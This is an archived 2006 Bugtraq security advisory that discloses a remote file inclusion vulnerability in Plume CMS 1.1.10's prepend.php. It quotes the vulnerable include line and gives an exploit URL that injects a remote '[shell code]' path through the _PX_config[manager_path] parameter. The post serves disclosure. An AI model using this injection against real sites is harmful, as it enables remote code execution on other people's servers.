lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060915221157.3726.qmail@securityfocus.com> Date: 15 Sep 2006 22:11:57 -0000 From: D3nGeR@...il.CoM To: bugtraq@...urityfocus.com Subject: Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability Vendor: Plume CMS 1.1.10 Found By : D3nGeR Scripit Site : http://plume-cms.net in file [prepend.php] ; include_once $_PX_config['manager_path'].'/inc/class.config.php' code http://site.com/[path]manager/frontinc/prepend.php?_PX_config[manager_path]=[shell code ]